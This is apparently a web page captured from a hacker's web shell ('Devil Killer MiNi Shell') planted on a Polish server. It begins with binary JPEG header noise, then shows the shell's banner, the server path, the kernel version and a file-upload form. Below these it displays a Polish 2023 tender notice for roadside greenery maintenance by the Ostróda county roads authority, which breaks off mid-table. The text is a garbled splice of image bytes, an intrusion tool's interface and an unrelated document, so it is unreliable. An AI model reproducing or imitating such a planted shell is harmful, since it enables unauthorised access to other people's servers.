JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230427/0019602301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Utrzymanie zieleni na terenie działania Zarządu Dróg Powiatowych w Ostródzie na rok 2023” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Ostródzie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510751190</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grunwaldzka 62A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ostróda</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">basia_dt@zdp.ostroda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdp.ostroda.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Utrzymanie zieleni na terenie działania Zarządu Dróg Powiatowych w Ostródzie na rok 2023” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f3a34340-e4e5-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00196023</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00055067/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Utrzymanie zieleni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/760231 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/760231</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>2. Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej znajdują się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe zasady dotyczące RODO- § 37 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe zasady dotyczące RODO- § 37 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2610.13.2023.BŻ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Koszenie traw i chwastów, pielęgnacja żywopłotów oraz pielęgnacja klombów w m. Ostróda”<br/>1. Zakres zamówienia, wymagania wykonania i odbioru wykonania prac:<br/>1) Koszenie traw i chwastów<br/>a) Koszenie traw i chwastów wraz z natychmiastowym uprzątnięciem pokosu <br/>i uporządkowaniem terenu (sprzątnięcie papierów, butelek, puszek i innych zanieczyszczeń zalegających na koszonym obszarze) w pasie drogowym w ciągach ulic powiatowych powinno być wykonywane pięciokrotnie w sezonie (maj- wrzesień), pierwsze w okresie wiosennym (maj). Rozpoczęcie i zakończenie pierwszego koszenia traw i chwastów powinno być wykonane w takim okresie, aby nie dopuścić do wysypu nasion chwastów w wyniku ich przekwitnięcia. Najbardziej miarodajnym okresem pierwszego koszenia traw jest okres drugiej połowy maja, przy czym termin rozpoczęcia będzie wskazany przez Kierownika Obwodu Drogowego nr 1 <br/>w Ostródzie lub Majstra Obwodu Drogowego nr 1 w Ostródzie. Kolejne koszenia będą odbywać się w czerwcu, lipcu, sierpniu i wrześniu w miejscach i terminach wskazanych przez Kierownika Obwodu Drogowego nr 1 w Ostródzie lub Majstra Obwodu Drogowego nr 1 w Ostródzie. <br/>b) W pierwszej kolejności powinny być koszone trawy i chwasty na koronie drogi, a w szczególności występujące na:<br/>- pasach dzielących,<br/>- wysepkach i trawnikach,<br/>- poboczach,<br/>- pod barierami, oraz w miejscach mających zasadniczy wpływ na wizualny wygląd drogi. Wysokość trawy po skoszeniu powinna być nie większa niż <br/>5 cm.<br/>c) Należy zwracać uwagę, aby trawa i chwasty nie powodowały ograniczeń widoczności i nie zasłaniały urządzeń drogowych (np. barier, znaków) co może stworzyć zagrożenia dla ruchu drogowego lub utrudnić drożność rowów odwadniających. Wycięcie traw i chwastów w miejscach niedostępnych i częściowo obsadzonych wykonuje się kosiarkami żyłkowymi równolegle z głównym koszeniem. Dopuszcza się koszenie w tych miejscach traw, chwastów i jednorocznych samosiewów kosą.<br/>d) W zależności od potrzeb dopuszcza się koszenie niektórych obszarów częściej niż pięć razy, ale ogólna powierzchnia koszonego obszaru nie może przekroczyć pierwotnie założonej.<br/>Zakres terenów zielonych podlegający koszeniu zawiera tabela nr 1.<br/>Zamawiający może każdorazowo zmniejszyć ilość metrów kwadratowych podlegających koszeniu w danym miesiącu, bądź zwiększyć ilość koszeń w ciągach niektórych ulic- w zależności od potrzeb. Ilość metrów kwadratowych podlegających koszeniu w danym miesiącu nie może przekroczyć ilości podanej w tabeli nr 1.<br/>e) Czas wykonania jednorazowego koszenia zakresu wynosi 7-14 dni kalendarzowych (kryterium oceny oferty). Wykonawca otrzyma wynagrodzenie, liczone po cenach jednostkowych, za faktycznie wykonaną pracę. Koszenie przy sprzyjających warunkach atmosferycznych (brak opadów, nie należy kosić mokrej trawy) musi odbywać się codziennie. Każdorazowe przerwanie prac z powodu opadów deszczu oraz każdorazowe ich wznowienie musi być potwierdzone Zamawiającemu informacją mailową (OD1). Nie wykonanie całego podanego zakresu koszenia (przy sprzyjających warunkach atmosferycznych) w określonym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr kwadratowy pomnożonej razy 5, za każdy nieskoszony metr kwadratowy. Potwierdzeniem wykonania zakresu koszenia wraz z ewentualnym określeniem ilości metrów nie wykonanych będzie protokół odbioru częściowego sporządzony <br/>w dniu następnym po upływie terminu wykonania prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego.<br/>W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/>2) Pielęgnacja żywopłotów<br/>a) Podczas cięcia pielęgnacyjnego ścina się w linii prostej ok. 10-15 cm nowo wyrośniętych pędów. Pozwala to zapewnić odpowiednią wysokość żywopłotu oraz tempo wzrostu. Gałęzie żywopłotu można przycinać lekko lub mocniej. Zależy to od kondycji żywopłotu.<br/>b) Uprzątnąć teren po wykonywanych pracach (np. gałęzie, liście itp.).<br/>c) Cięcie żywopłotu odbywać się będzie dwa razy w ciągu okresu wegetacyjnego (maj- wrzesień).<br/>d) Czas wykonania pielęgnacji żywopłotów (całego zakresu) wynosi 10 dni kalendarzowych. Nie wykonanie całego podanego zakres pielęgnacji żywopłotu w tym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr bieżący pomnożonej razy 5, za każdy nie zrobiony metr bieżący żywopłotu. Potwierdzeniem wykonania prac będzie protokół odbioru częściowego prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego.<br/>W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/>Zakres i lokalizację żywopłotów zawiera tabela nr 2. <br/>3) Pielęgnacja klombów<br/>a) Pielęgnacja klombów polegać ma na odchwaszczaniu nasadzeń na klombach, usuwaniu roślin uschniętych, spulchnieniu ziemi wokół roślin oraz usunięcia innych zanieczyszczeń (sprzątnięcie papierów, butelek, puszek itp.). Prace odbywać się będą trzy razy w sezonie (maj- wrzesień). Usunięte chwasty i inne zanieczyszczenia wykonawca usunie na własny koszt.<br/>b) Lokalizacja oraz ilość klombów znajduje się w tabeli nr 3.<br/>c) Czas wykonania pielęgnacji klombów (całego zakresu) wynosi 14 dni kalendarzowych. Nie wykonanie całego podanego zakres pielęgnacji klombów w tym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr kwadratowy pomnożonej razy 5, za każdy nie zrobiony metr kwadratowy klombów. Potwierdzeniem wykonania prac będzie protokół odbioru częściowego prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego.<br/>W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/>2. Prace o których mowa w ust. 1, 2 i 3 odbywać się będą każdorazowo na pisemne zgłoszenie Zamawiającego (e-mail), rozpoczęcie prac nastąpi w terminie do 2 dni od zgłoszenia.<br/>Tabela nr 1<br/>L.p.	Numer ulicy	Nazwa ulicy	Powierzchnia m2<br/>1	1243N	ul. Czarnieckiego	1 772,00<br/>2	3032N	ul. 11 Listopada	9 413,00<br/>3	3047N	ul. Sienkiewicza	384,00<br/>4	3012N	Ul. Grunwaldzka 13 000,00<br/>5	3015N	ul. Kopernika 661,00<br/>6	3058N	Ul. Żeromskiego	829,00<br/>7	3055N	Ul. Warmińska 984,00<br/>8	3005N	Ul. Chrobrego 6 774,00<br/>9	3052N	Ul. 21 Stycznia 3 850,00<br/>10	3026N	Ul. Jana Pawła II	434,00<br/>11	3035N	Ul. Pieniężnego 2 476,00<br/>12	3031N	Ul. Wyszyńskiego 716,00<br/>13	3029N	Ul. Mickiewicza 743,00<br/>14	3053N	Ul. Szosa Elbląska 18 151,00<br/>15	3018N	ul. 3 Maja 1 768,00<br/>16	3033N	Ul. Parkowa 6 082,00<br/>17	3034N	Ul. Partyzantów 2 065,00<br/>18	1961N	Ul. Jaracza	1 395,00<br/>19	1245N	Ul. Olsztyńska 7 256,00<br/>20	3010N	Ul. Gizewiusza 828,00<br/>21	1230N	Ul. Plebiscytowa 2 830,00<br/>22	3046N	Ul. Słowackiego 1 727,00<br/>23	3050N	Ul. Stapińskiego 596,00<br/>24	3105N	ul. Jagiełły razem z rondem Solidarności 19 841,00<br/>25	3037N	Ul. Piłsudzkiego	196,00<br/>26	3049N	Ul. Sportowa	191,00<br/>27	3051N	Ul. Drwęcka 1 000,00<br/>28	3011N	Ul. Graniczna	5 662,00<br/>29	3041N	Ul. Pułaskiego	81,00<br/>30	3019N	ul. Herdera	95,00<br/>31	3045N	Ul. Spokojna	2 639,00<br/>32.	3001N ul. Garnizonowa	1 100,00<br/>33	3008N	Ul. Dominika Savio	52,00<br/>34	3025N ul. Sikorskiego	40,00<br/>35	3038N ul. Poniatowskiego	40,00<br/>36	3048N	ul. Sowińskiego	70,00<br/>37	3056N ul. Wyspiańskiego	120,00<br/>38	3017N ul. Kętrzyńskiego	45,00<br/>39	3059N	ul. Niepodległości	290,00<br/>40	bez numeru	ul. Kowcza	1 150,00<br/> Razem	117 346,00<br/>Tabela nr 2<br/>Lp	nr ulicy	Nazwa Ilość mb<br/>1	3105N	ul. Jagiełły	350<br/>2	1961N	ul. Jaracza	100<br/>3	1243N ul. Czarnieckiego	200<br/>4	3012N	ul. Grunwaldzka	170<br/>5	3016N ul. Armii Krajowej	115<br/>6	3052N	ul. 21 Stycznia	85<br/>7	3035N	ul. Pieniężnego	80<br/>8	3055N	ul. Warmińska	70<br/>9	3015N	ul. Kopernika	150<br/> Razem	1320<br/>Tabela nr 3<br/>Lp	Lokalizacja	Ilość m2<br/>1	Skrzyżowanie Grunwaldzka/Jagiełły	120<br/>2	Skrzyżowanie Czarnieckiego/Jana Pawła II 60<br/>3	Skrzyżowanie 11 Listopada/Pieniężnego	82<br/>4	Ciąg ulicy Czarnieckiego	300<br/>5	ciąg ulicy Jana Pawła II	552<br/> Razem	1014 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77340000-5 - Usługi okrzesywania drzew oraz przycinania żywopłotów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą<br/>łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty<br/>w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.2. Ocenie będą podlegać wyłącznie oferty nie<br/>podlegające odrzuceniu.3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wykonania jednorazowego koszenia przekazanego zakresu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 2: „Koszenie traw i chwastów w m. Morąg”<br/>1) Koszenie traw i chwastów<br/>a) Koszenie traw i chwastów wraz z natychmiastowym uprzątnięciem pokosu <br/>i uporządkowaniem terenu (sprzątnięcie papierów, butelek, puszek i innych zanieczyszczeń zalegających na koszonym obszarze) w pasie drogowym w ciągach ulic powiatowych powinno być wykonywane pięciokrotnie w sezonie (maj- wrzesień), pierwsze w okresie wiosennym (maj). Rozpoczęcie i zakończenie pierwszego koszenia traw i chwastów powinno być wykonane w takim okresie, aby nie dopuścić do wysypu nasion chwastów w wyniku ich przekwitnięcia. Najbardziej miarodajnym okresem pierwszego koszenia traw jest okres drugiej połowy maja, przy czym termin rozpoczęcia będzie wskazany przez Kierownika Obwodu Drogowego nr 2 w Morągu lub Majstra Obwodu Drogowego nr 2 w Morągu. Kolejne koszenia będą odbywać się w czerwcu, lipcu, sierpniu i wrześniu w miejscach i terminach wskazanych przez Kierownika Obwodu Drogowego nr 2 w Morągu lub Majstra Obwodu Drogowego nr 2 w Morągu. <br/>b) W pierwszej kolejności powinny być koszone trawy i chwasty na koronie drogi, a w szczególności występujące na:<br/>- pasach dzielących,<br/>- wysepkach i trawnikach,<br/>- poboczach,<br/>- pod barierami, oraz w miejscach mających zasadniczy wpływ na wizualny wygląd drogi. Wysokość trawy po skoszeniu powinna być nie większa niż 5cm.<br/>c) Należy zwracać uwagę, aby trawa i chwasty nie powodowały ograniczeń widoczności i nie zasłaniały urządzeń drogowych (np. barier, znaków) co może stworzyć zagrożenia dla ruchu drogowego lub utrudnić drożność rowów odwadniających. Wycięcie traw i chwastów w miejscach niedostępnych i częściowo obsadzonych wykonuje się kosiarkami żyłkowymi równolegle z głównym koszeniem. Dopuszcza się koszenie w tych miejscach traw, chwastów i jednorocznych samosiewów kosą.<br/>d) W zależności od potrzeb dopuszcza się koszenie niektórych obszarów częściej niż pięć razy, ale ogólna powierzchnia koszonego obszaru nie może przekroczyć pierwotnie założonej. Zakres terenów zielonych podlegający koszeniu zawiera tabela nr 4. Zamawiający może każdorazowo zmniejszyć ilość metrów kwadratowych podlegających koszeniu w danym miesiącu, bądź zwiększyć ilość koszeń w ciągach niektórych ulic- w zależności od potrzeb. Ilość metrów kwadratowych podlegających koszeniu w danym miesiącu nie może przekroczyć ilości podanej w tabeli nr 4.<br/>e) Czas wykonania jednorazowego koszenia zakresu wynosi 5-10 dni kalendarzowych (kryterium oceny oferty). Wykonawca otrzyma wynagrodzenie, liczone po cenach jednostkowych, za faktycznie wykonaną pracę. Koszenie przy sprzyjających warunkach atmosferycznych (brak opadów, nie należy kosić mokrej trawy) musi odbywać się codziennie. Każdorazowe przerwanie prac z powodu opadów deszczu oraz każdorazowe ich wznowienie musi być potwierdzone Zamawiającemu informacją mailową (OD2). Nie wykonanie całego podanego zakres u koszenia (przy sprzyjających warunkach atmosferycznych) w określonym czasie spowoduje naliczenie kar umownych w wysokości ceny jednostkowej (netto) za 1 metr kwadratowy pomnożonej razy 5, za każdy nieskoszony metr kwadratowy. Potwierdzeniem wykonania zakresu koszenia wraz z ewentualnym określeniem ilości metrów nie wykonanych będzie protokół odbioru częściowego sporządzony w dniu następnym po upływie terminu wykonania prac. Wykonawca zobowiązany jest do wyznaczenia pracownika sprawującego kontrole nad sprawnym prowadzeniem prac porządkowych. Pracownik ten zobowiązany jest stawić się na telefoniczne wezwanie Zamawiającego do przeprowadzenia wspólnej kontroli, w miejsce wskazane przez Zamawiającego.<br/>W przypadku niestawienia się przedstawiciela Wykonawcy na telefoniczne wezwanie Zamawiającego w określonym miejscu i czasie, Zamawiający przeprowadzi kontrolę samodzielnie.<br/>2. Prace o których mowa w ust. 1 odbywać się będą każdorazowo na zgłoszenie pisemne Zamawiającego (e-mail), rozpoczęcie prac nastąpi w terminie do 2 dni od zgłoszenia.<br/><br/>Tabela nr 4<br/>Lp.	Numer ulicy	Nazwa ulicy	Powierzchnia m2 <br/>1	1180N	Wróblewskiego	4395<br/>2	3073N	Leśna	12092<br/>3	3076N	Mickiewicza	3676<br/>4	3082N	Sienkiewicza	3398<br/>5	1178N	